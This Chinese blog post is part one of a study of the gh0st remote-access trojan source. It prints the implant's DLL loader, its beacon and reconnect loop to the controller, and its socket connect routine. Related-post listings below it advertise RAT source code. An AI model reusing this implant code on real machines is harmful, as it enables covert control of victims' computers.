C++开源项目研究——gh0st远控(一)

最新推荐文章于 2024-06-17 15:48:54 发布
最新推荐文章于 2024-06-17 15:48:54 发布
阅读量517 收藏 10
点赞数 4
文章标签: c++ 网络安全 windows c语言 mfc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tandy12356_/article/details/137042329
版权

一、通过肉机启动TestDll.exe来加载被控端的功能dll

使用TestDll.exe来调用TestRun函数:

其实原理很简单:

1)首先使用HMODULE hDllServer =LoadLibrary("server.dll")来加载dll

2)然后通过GetProcAddr(hDllServer,"TestRun");来获取导出函数的函数地址,进而通过函数指针pTestRunT来根据函数地址调用TestRun这个函数

注:要想通过GetProcAddr这种方式得到dll导出函数的地址,就需要你在dll里面定义成相应的导出函数,如:extern "C" __declspec(dllexport) void TestRun(char* strHost, int nPort);这种形式

main函数的完整代码:

int main() {
	std::cout << "hello world" << std::endl;
	char strHost[] = "127.0.0.1";
	int nPort = 80;
	//定义函数指针,实现按照函数地址调用指定类型的函数
	typedef void(_cdecl* TestRunT)(char* strHost, int nPort);

	HMODULE hDllServer = LoadLibrary("..\\..\\bin\\server\\server.dll");
	//HMODULE hDllServer = LoadLibrary("server.dll");

	TestRunT pTestRunT=(TestRunT)GetProcAddress(hDllServer, "TestRun");

	if (pTestRunT != nullptr) {
		pTestRunT(strHost, nPort);//调用这个导出函数
	}

	system("pause");
	return 0;

}

二、dllmain.cpp当中定义的导出函数TestRun

接下来我们来看看这个导出函数具体长啥样

显然TestRun函数的主任务就是创建了main线程,也就是主线程

//添加导出函数
extern "C" __declspec(dllexport) void TestRun(char* strHost, int nPort) {
	strcpy(g_strHost, strHost);  //保存上线地址
	g_dwPort = nPort;             //保存上线端口
	HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)g_strHost, 0, NULL);
	//这里等待线程结束
	WaitForSingleObject(hThread, INFINITE);
	CloseHandle(hThread);
}

那么主线程main又做了哪些事情呢?

1)这里面比较重要的就是声明了CClientSocket socketClient;类

可以大致瞅一眼这个类的定义:里面包含了m_Socket这种关键信息,之所以封装成一个类是为了方便以后的管理,使得里面的变量和接口不会太散乱

2)里面通过以下语句来给肉机指定要连接的服务端的IP和端口号

而g_strHost和g_dwPort的来源就是通过extern "C" __declspec(dllexport) void TestRun(char* strHost, int nPort)的形参传递进来的 

//上线地址 
lpszHost = g_strHost; 
dwPort = g_dwPort;

3)下一步就是肉机来主动连接主控端了:

if (!socketClient.Connect(lpszHost, dwPort))
		{
			bBreakError = CONNECT_ERROR;       //---连接错误跳出本次循环
			continue;
		}

4)以下是main函数的完整代码:

DWORD WINAPI main(char* lpServiceName)
{
	// lpServiceName,在ServiceMain返回后就没有了
	char	strServiceName[256];
	char	strKillEvent[50];
	HANDLE	hInstallMutex = NULL;
	//
	// Set Window 
	//!!!winsta0是设置的是xp的窗口,以后可能需要修改
	HWINSTA hOldStation = GetProcessWindowStation();
	HWINSTA hWinSta = OpenWindowStation("winsta0", FALSE, MAXIMUM_ALLOWED);
	if (hWinSta != NULL)
		SetProcessWindowStation(hWinSta);
	//
	//

	if (CKeyboardManager::g_hInstance != NULL)
	{
		SetUnhandledExceptionFilter(bad_exception);

		lstrcpy(strServiceName, lpServiceName);
		wsprintf(strKillEvent, "Global\\Gh0st %d", GetTickCount()); // 随机事件名

		hInstallMutex = CreateMutex(NULL, true, g_strHost);
		//ReConfigService(strServiceName);   //--lang--
		// 删除安装文件
	//	DeleteInstallFile(lpServiceName);     //--lang--
	}
	// 告诉操作系统:如果没有找到CD/floppy disc,不要弹窗口吓人
	SetErrorMode(SEM_FAILCRITICALERRORS);
	char* lpszHost = NULL;
	DWORD	dwPort = 80;
	char* lpszProxyHost = NULL;
	DWORD	dwProxyPort = 0;
	char* lpszProxyUser = NULL;
	char* lpszProxyPass = NULL;

	HANDLE	hEvent = NULL;

	//---这里声明了一个 CClientSocket类
	CClientSocket socketClient;
	BYTE	bBreakError = NOT_CONNECT; // 断开连接的原因,初始化为还没有连接
	while (1)
	{
		// 如果不是心跳超时,不用再sleep两分钟
		if (bBreakError != NOT_CONNECT && bBreakError != HEARTBEATTIMEOUT_ERROR)
		{
			// 2分钟断线重连, 为了尽快响应killevent
			for (int i = 0; i < 2000; i++)
			{
				hEvent = OpenEvent(EVENT_ALL_ACCESS, false, strKillEvent);
				if (hEvent != NULL)
				{
					socketClient.Disconnect();
					CloseHandle(hEvent);
					break;
					break;
				}
				// 改一下
				Sleep(60);
			}
		
		//上线地址
		lpszHost = g_strHost;
		dwPort = g_dwPort;

		if (lpszProxyHost != NULL)
			socketClient.setGlobalProxyOption(PROXY_SOCKS_VER5, lpszProxyHost, dwProxyPort, lpszProxyUser, lpszProxyPass);
		else
			socketClient.setGlobalProxyOption();

		DWORD dwTickCount = GetTickCount();
		//---调用Connect函数向主控端发起连接
		if (!socketClient.Connect(lpszHost, dwPort))
		{
			bBreakError = CONNECT_ERROR;       //---连接错误跳出本次循环
			continue;
		}
		// 登录
		DWORD dwExitCode = SOCKET_ERROR;
		sendLoginInfo(strServiceName, &socketClient, GetTickCount() - dwTickCount);
		//---注意这里连接成功后声明了一个CKernelManager 到CKernelManager类查看一下
		CKernelManager	manager(&socketClient, strServiceName, g_dwServiceType, strKillEvent, lpszHost, dwPort);
		socketClient.setManagerCallBack(&manager);

		//
		// 等待控制端发送激活命令,超时为10秒,重新连接,以防连接错误
		for (int i = 0; (i < 10 && !manager.IsActived()); i++)
		{
			Sleep(1000);
		}
		// 10秒后还没有收到控制端发来的激活命令,说明对方不是控制端,重新连接
		if (!manager.IsActived())
			continue;

		//

		DWORD	dwIOCPEvent;
		dwTickCount = GetTickCount();

		do
		{
			hEvent = OpenEvent(EVENT_ALL_ACCESS, false, strKillEvent);
			dwIOCPEvent = WaitForSingleObject(socketClient.m_hEvent, 100);
			Sleep(500);
		} while (hEvent == NULL && dwIOCPEvent != WAIT_OBJECT_0);

		if (hEvent != NULL)
		{
			socketClient.Disconnect();
			CloseHandle(hEvent);
			break;
		}
	}
#ifdef _DLL
	//
	// Restor WindowStation and Desktop	
	// 不需要恢复卓面,因为如果是更新服务端的话,新服务端先运行,此进程恢复掉了卓面,会产生黑屏
	// 	SetProcessWindowStation(hOldStation);
	// 	CloseWindowStation(hWinSta);
	//
	//
#endif
	SetErrorMode(0);
	ReleaseMutex(hInstallMutex);
	CloseHandle(hInstallMutex);
}

三、Connect函数剖析

然后我们来跟进Connect函数:

1)其中最重要的当然是:

m_Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if (connect(m_Socket, (SOCKADDR *)&ClientAddr, sizeof(ClientAddr)) == SOCKET_ERROR)
		return false;

得到和主控端连接的socket之后就相当于得到了一个四元组来唯一标识二者的通信关系,之后的交流都通过这次连接的socket来进行

2)Connect函数完整代码: 

//---向主控端发起连接
bool CClientSocket::Connect(LPCTSTR lpszHost, UINT nPort)
{
	// 一定要清除一下,不然socket会耗尽系统资源
	Disconnect();
	// 重置事件对像
	ResetEvent(m_hEvent);
	m_bIsRunning = false;

	if (m_nProxyType != PROXY_NONE && m_nProxyType != PROXY_SOCKS_VER4 && m_nProxyType != PROXY_SOCKS_VER5)
		return false;
	m_Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 

	if (m_Socket == SOCKET_ERROR)   
	{ 
		return false;   
	}

	hostent* pHostent = NULL;
	if (m_nProxyType != PROXY_NONE)
		pHostent = gethostbyname(m_strProxyHost);
	else
		pHostent = gethostbyname(lpszHost);

	if (pHostent == NULL)
		return false;
	
	// 构造sockaddr_in结构
	sockaddr_in	ClientAddr;
	ClientAddr.sin_family	= AF_INET;
	if (m_nProxyType != PROXY_NONE)
		ClientAddr.sin_port	= htons(m_nProxyPort);
	else
		ClientAddr.sin_port	= htons(nPort);

	ClientAddr.sin_addr = *((struct in_addr *)pHostent->h_addr);

	if (connect(m_Socket, (SOCKADDR *)&ClientAddr, sizeof(ClientAddr)) == SOCKET_ERROR)   
		return false;
// 禁用Nagle算法后,对程序效率有严重影响
// The Nagle algorithm is disabled if the TCP_NODELAY option is enabled 
//   const char chOpt = 1;
// 	int nErr = setsockopt(m_Socket, IPPROTO_TCP, TCP_NODELAY, &chOpt, sizeof(char));

	// 验证socks5服务器
	if (m_nProxyType == PROXY_SOCKS_VER5 && !ConnectProxyServer(lpszHost, nPort))
	{
		return false;
	}
	// 不用保活机制,自己用心跳实瑞
	
	const int chOpt = 1; // True !!!我把char改成了int
	// Set KeepAlive 开启保活机制, 防止服务端产生死连接
	//!!!将sizeof(chOpt)改成了sizeof(int)
	if (setsockopt(m_Socket, SOL_SOCKET, SO_KEEPALIVE, (char *)&chOpt, sizeof(chOpt)) == 0)
	{
		// 设置超时详细信息
		tcp_keepalive	klive;
		klive.onoff = 1; // 启用保活
		klive.keepalivetime = 1000 * 60 * 3; // 3分钟超时 Keep Alive
		klive.keepaliveinterval = 1000 * 5; // 重试间隔为5秒 Resend if No-Reply
		WSAIoctl
			(
			m_Socket, 
			SIO_KEEPALIVE_VALS,
			&klive,
			sizeof(tcp_keepalive),
			NULL,
			0,
			(unsigned long *)&chOpt,
			0,
			NULL
			);
	}

	m_bIsRunning = true;
	//---连接成功,开启工作线程  转到WorkThread
	m_hWorkerThread = (HANDLE)MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)WorkThread, (LPVOID)this, 0, NULL, true);
	return true;
}

刑了,今天的你就到此为止吧,明天还要接着浪啊!🎃🎃 作者:布卍哥 

布の哥
关注
神牛远控和源码,神牛远程控制全套源码,C,C++
09-10
神牛远程控制
红队专题-从零开始VC++C/S远程控制软件RAT-MFC-远控介绍及界面编写
aming小老弟
10-28 1338
服务启动 ---- 注销 模式 可以自动启动服务 上线编写前 功能了解分析界面 运行模式// 两个消息 上线 下线信息typedef struct tagMSGINFO //传输消息结构体int Msg_id;}MSGINFO;typedef struct tagSYSTEMINFO //上线信息int os;bool Cam;//摄像头double ver;
【远程桌面软件RustDesk】开源远程控制神器!RustDesk为开源虚拟与远程桌面基础架构,也支持网页版,TeamViewer 和向日葵的替代品
Xminyang的博客
07-16 2万+
【远程桌面】rustdesk开源的远程桌面,TeamViewer 和向日葵的替代品. rustdesk:一款开源远程桌面客户端软件,基于 Rust 编写的开源远程桌面客户端软件,标星 16.5K。这个开源远程工具开箱即用,无需进行额外的配置,是 TeamViewer 和向日葵的替代品。 这个开源产品支持 Windows 、Linux、MacOS 系统,界面简洁漂亮。........................
VS2019编译gh0st3.6远控源码成功
m0_51741551的博客
12-31 886
vs2015 vs2017 vs2019都可以编译
远程控制——C++编程入门项目(完整源码)
陈子青的博客
12-17 1万+
在socket通信基础下,很容易实现简易的远程控制,这里使用本机做了演示,抛砖引玉,为大家提供更强大的远控思路。 效果:控制端 输入cmd命令,被控制端计算机执行命令。如图 提示等待命令输入,当输入calc,回车时,被控制端接受命令,并打开了计算器。 此时计算器被打开,并不是此程序所为,而是被控制端接受到 calc 命令并执行,以此为思路实现远控。 比如:Nslookup查看ip 地址 比如:write 打开对方写字版 你可以查看CMD命令大全......
7月22更新gh0st远控源码(下载SDK库)
07-30
gh0st远控源码】是针对C++编程领域的一款远程控制软件的源代码,其核心在于提供了学习和研究远程控制技术的机会。gh0st以其功能性和稳定性著称,对于想要深入理解网络通信、系统控制以及软件安全的开发者而言,这...
Gh0st:远控原始码
03-24
开源的Gh0st源代码对于系统管理员和安全研究人员来说是一份宝贵的资源。通过分析这个源代码,他们可以了解黑客如何设计和实现远程控制机制,从而改进安全防护措施,提高系统的抗攻击能力。同时,这也为教育和培训...
红狼远控gh0st3.6版本的vs2010 vs2013 vs2015 vs2017
04-05
【红狼远控gh0st3.6版本的vs2010 vs2013 vs2015 vs2017】是一款远程控制软件的源码版本,适用于多种Visual Studio开发环境,包括Visual Studio 2010、2013、2015和2017。这个项目提供了深入理解远程控制软件开发的...
win7_gh0st.rar_gh0st vc_gh0st开_w7非gh_远控_远控 win7
07-13
gh0st是一款知名的远程控制工具,由VC++(Visual C++)开发,其源码包含在内,可以供程序员学习和研究。下面将详细解释gh0st远程控制软件及其与Win7系统的兼容性,以及如何在Windows 7环境下搭建和运行。 gh0st远程...
gh0st3.6_src红狼官方_源码_远程_Gh0st_远程控制_
10-02
Gh0st是一款知名的远程控制工具,通常用于系统管理和维护,但也可能被滥用进行非法活动。"src"代表"source code",即原始代码,意味着我们将看到程序设计的底层细节。"红狼官方"可能是指这个源码版本的发布者或者...
C/C++远控编写第一节【6】
司徒荆的博客
05-08 711
添加菜单消息响应的函数:终端管理 进程管理 窗口管理 桌面管理 文件管理 语音管理 视频管理 服务管理 注册表管理。
小伙用C++搞定远程桌面监控系统,轻松拿下12家offer!
python学习+VX:YYQX2209
10-27 1692
基于C++的远程桌面监控系统,主程序分服务器端和客户端,服务器端启动后自动获取本机IP,然后可以修改默认等待端口,客户端则需要指定服务端IP和对应端口,点击后程序开始连接,如果选择成功可以显示服务端桌面,截图因需要服务端,所以没有抓到。 实现界面如下: 项目结构展示: 部分源码展示: 远程桌面监控软件不仅仅可以监控电脑桌面,还可以进行摄像头视频的监控,在对方不知道的情况下打开被控端的摄像头...
C/C++远控编写第一节【1】
司徒荆的博客
05-08 1217
界面基本框架设计,根据住主界面自由伸缩。
揭秘QuasarRAT:一款开源工具,如何一步步成为黑客利器?
最新发布
白帽黑客鹏哥的博客
06-17 1157
QuasarRAT(CinaRAT、Yggdrasil)是一种功能齐全的开源远控工具,具有收集系统信息、下载并执行应用程序、记录击键、抓取屏幕截图等功能。在过去的一年中,新华三聆风实验室监测到该工具被一些黑客组织频频利用,用来实现恶意后门等目的。新华三聆风实验室已实现对QuasarRAT及其同源、关联家族的主动狩猎和威胁情报生产,全线安全产品均已搭载最新情报特征库,具备全面威胁覆盖能力,让企业主动安全防御更有效。
【GitHub项目推荐--7个开源免费远程管理工具(RAT)】【转载】
j8267643的博客
04-05 3730
远程管理工具RAT是Remote Access Trojan的缩写。RAT软件可用于远程管理和技术支持等。但有时候它也是一种恶意软件,可以在未经授权情况下远程控制计算机系统。RAT用于远程管理或者技术支持给我们在项目维护或者协作提供了很多方便。但由于其用途的广泛,就像菜刀,用在厨房就是切菜,但落到坏人手里可能就是作恶工具。在这里需要做个免责声明:本文所介绍内容仅用于技术研究目的,对您如何选择使用所介绍的任何内容、工具、源代码不承担任何责任和义务。下面所罗列的内容是一些比较出名的RAT免费开源项目
Github:分享一款开源的跨平台多功能远程控制和监控工具Spark
IT技术分享社区
02-18 1379
今天要给大家推荐一个开源的跨平台多功能远程控制和监控工具:Spark。目前该项目处于不维护状态,大家可以自己根据需要进行扩展,满足自己实际的监控需求。Spark 是一个免费、安全、开源、基于网页、跨平台且功能丰富的远程管理工具,可以让你通过浏览器,随时随地管理设备。以下是 Spark 项目的部分使用页面。
这款开源的跨平台多功能远程控制和监控工具推荐你试试
独行侠梦的博客
06-09 610
今天要给大家推荐一个开源项目:XZB-1248/Spark该项目在 GitHub 有 700+的Star,用一句话介绍该项目就是:“Spark是一个 Go 编写的,网页UI、跨平台以及多功能的远程控制和监控工具,你可以随时随地监控和控制所有设备。”。以下是 Spark 项目的部分使用页面。1、设备列表及操作列表2、登录机器 Shell 执行命令3、桌面远程访问4、远程设备的进程管理5、远程设备文...
开源一款远程控制软件 —— pcshare
热门推荐
左雪菲的专栏
06-01 5万+
这里开放一款远程控制软件的源码——pcshare,该软件分为被控制端和控制端。部分界面如下:控制端通过寄生在被控制端的后台程序来实现控制,可以对被控制台进行文件管理、屏幕监控、键盘监控、监控管理、查看被控制端的服务和注册表,甚至是控制被控制端的摄像头。一、软件使用方法介绍:1. 启动PcShare.exe,这是控制端主程序,该程序会在8080端口上监听被控制端的连接。2. 生成被控制端宿主程序,点...
分享:局域网内免费又实用的远程控制工具
qq_25796247的博客
10-12 1万+
介绍局域网内的远程控制工具
gh0st远控源码更新:学习远程控制新视角
gh0st是一个开源的远程控制软件,能够实现在一个计算机系统上对另一个远程计算机系统的控制。gh0st以其稳定性和强大的功能广泛应用于网络管理、远程协助和教育演示等领域。 2. gh0st源码的C++编程基础: gh0st使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值